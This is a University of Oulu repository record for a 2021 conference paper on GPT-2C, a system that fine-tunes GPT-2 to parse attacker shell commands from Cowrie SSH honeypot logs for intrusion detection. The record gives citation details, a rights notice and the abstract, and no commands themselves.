Hyppää sisältöön
    • FI
    • ENG
  • FI
  • /
  • EN
OuluREPO – Oulun yliopiston julkaisuarkisto / University of Oulu repository
Näytä viite 
  •   OuluREPO etusivu
  • Oulun yliopisto
  • Avoin saatavuus
  • Näytä viite
  •   OuluREPO etusivu
  • Oulun yliopisto
  • Avoin saatavuus
  • Näytä viite
JavaScript is disabled for your browser. Some features of this site may not work without it.

GPT-2C : a parser for honeypot logs using large pre-trained language models

Setianto, Febrian; Tsani, Erion; Sadiq, Fatima; Domalis, Georgios; Tsakalidis, Dimitris; Kostakos, Panos (2022-01-19)

 
Avaa tiedosto
nbnfi-fe2022030221424.pdf (381.0Kt)
nbnfi-fe2022030221424_meta.xml (41.71Kt)
nbnfi-fe2022030221424_solr.xml (32.63Kt)
Lataukset: 

URL:
https://doi.org/10.1145/3487351.3492723

Setianto, Febrian
Tsani, Erion
Sadiq, Fatima
Domalis, Georgios
Tsakalidis, Dimitris
Kostakos, Panos
Association for Computing Machinery
19.01.2022

Febrian Setianto, Erion Tsani, Fatima Sadiq, Georgios Domalis, Dimitris Tsakalidis, and Panos Kostakos. 2021. GPT-2C: a parser for honeypot logs using large pre-trained language models. In Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining (ASONAM '21). Association for Computing Machinery, New York, NY, USA, 649–653. DOI:https://doi.org/10.1145/3487351.3492723

https://rightsstatements.org/vocab/InC/1.0/
© 2021 Association for Computing Machinery. This is the author's version of the work. It is posted here for your personal use. Not for redistribution. The definitive Version of Record was published in Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining (ASONAM '21), https://doi.org/10.1145/3487351.3492723.
https://rightsstatements.org/vocab/InC/1.0/
Näytä kaikki kuvailutiedot
Julkaisun pysyvä osoite on
https://urn.fi/URN:NBN:fi-fe2022030221424
Tiivistelmä

Abstract

Deception technologies like honeypots generate large volumes of log data, which include illegal Unix shell commands used by latent intruders. Several prior works have reported promising results in overcoming the weaknesses of network-level and program-level Intrusion Detection Systems (IDSs) by fussing network traffic with data from honeypots. However, because honeypots lack the plug-in infrastructure to enable real-time parsing of log outputs, it remains technically challenging to feed illegal Unix commands into downstream predictive analytics. As a result, advances on honeypot-based user-level IDSs remain greatly hindered. This article presents a run-time system (GPT-2C) that leverages a large pre-trained language model (GPT-2) to parse dynamic logs generated by a live Cowrie SSH honeypot instance. After fine-tuning the GPT-2 model on an existing corpus of illegal Unix commands, the model achieved 89% inference accuracy in parsing Unix commands with acceptable execution latency.

Kokoelmat
  • Avoin saatavuus [38865]
oulurepo@oulu.fiOulun yliopiston kirjastoOuluCRISLaturiMuuntaja
SaavutettavuusselosteTietosuojailmoitusYlläpidon kirjautuminen
 

Selaa kokoelmaa

NimekkeetTekijätJulkaisuajatAsiasanatUusimmatSivukartta

Omat tiedot

Kirjaudu sisäänRekisteröidy
oulurepo@oulu.fiOulun yliopiston kirjastoOuluCRISLaturiMuuntaja
SaavutettavuusselosteTietosuojailmoitusYlläpidon kirjautuminen